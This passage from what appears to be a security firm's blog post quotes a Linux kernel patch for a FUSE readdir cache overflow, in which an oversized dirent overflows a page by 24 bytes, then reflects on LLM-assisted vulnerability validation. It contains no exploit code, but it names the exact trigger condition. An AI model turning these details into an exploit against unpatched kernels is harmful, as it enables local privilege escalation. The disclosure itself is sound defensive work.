As a result, a malicious FUSE server can return a dirent with
namelen=4095, producing a serialized record size of 4120 bytes. On 4 KiB
page systems this causes memcpy() to overflow the cache page by 24 bytes
into the following kernel page.

Reject dirents that cannot fit in a single page before copying them into
the readdir cache.

Fixes: 69e34551152a ("fuse: allow caching readdir")
Cc: stable@vger.kernel.org # v6.16+
Assisted-by: Bynario AI
Signed-off-by: Samuel Page <sam@bynar.io>
Reported-by: Qi Tang <tpluszz77@gmail.com>
Reported-by: Zijun Hu <nightu@northwestern.edu>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Link: https://patch.msgid.link/20260420090139.662772-1-mszeredi@redhat.com
Signed-off-by: Christian Brauner <brauner@kernel.org>
---
 fs/fuse/readdir.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
index c2aae2eef0868b..aae657fd56c0ed 100644
--- a/fs/fuse/readdir.c
+++ b/fs/fuse/readdir.c
@@ -41,6 +41,10 @@ static void fuse_add_dirent_to_cache(struct file *file,
 	unsigned int offset;
 	void *addr;

+	/* Dirent doesn't fit in readdir cache page?  Skip caching. */
+	if (reclen > PAGE_SIZE)
+		return;
+
 	spin_lock(&fi->rdc.lock);
 	/*
 	 * Is cache already completed?  Or this entry does not go at the end of

Wrap-up

While the last part highlighted the discovery capabilities of LLMs, I think this vulnerability provides a good showcase of the kind of validation LLMs are capable of when properly orchestrated and harnessed, as demonstrated with an Ubuntu 26.04 LPE.

Automated validation is a difficult challenge to tackle. It's one thing to find suspicious code paths, but to determine whether this actually yields an exploitable primitive, and under what conditions or constraints, is often harder. However, it is an important one with the sharp increase in AI-generated vulnerability reports we're currently seeing across the industry.

Reducing that noise by demonstrating real, reproducible impact is an important step in using this new technology in a scalable, sustainable way.

In the final part of this series, I plan to spend some time evaluating how local models perform in vulnerability discovery and validation, using the two Linux kernel CVEs we've analysed in the first two parts as a case study.

SItRa1rEtV  l5oAoCkSi4n8g@  aXt9  y9oEuHrS  s0oGfAtEwVa7r$eZ  cOrWiGt4i9cDaBl&lTy4.W

request briefing

request briefing

S#t1a1rUtT  l0oYoKkRi3n1gQ  a0t$  yDoMuIrY  s6o1fGtOwQaHr$eE  cVrLiUt8iQc7a0lRl4yT.#

request briefing

request briefing

SNtBaNr@t5  lSoIoVkHiTnSgE  aXtF  yKoJu2r#  sAo0f1t&wDaNrUeS  cEr5i%t0i@cYa3lGlDy0.&

request briefing

request briefing

BYNARIO s.r.l. | PIAZZA BORROMEO 12, 20129 MILAN, ITALY | VAT- IT14434720968

all rights reserved

2026

BYNARIO s.r.l. | PIAZZA BORROMEO 12, 20129 MILAN, ITALY | VAT- IT14434720968

all rights reserved

2026

BYNARIO s.r.l. | PIAZZA BORROMEO 12, 20129 MILAN, ITALY | VAT- IT14434720968

all rights reserved

2026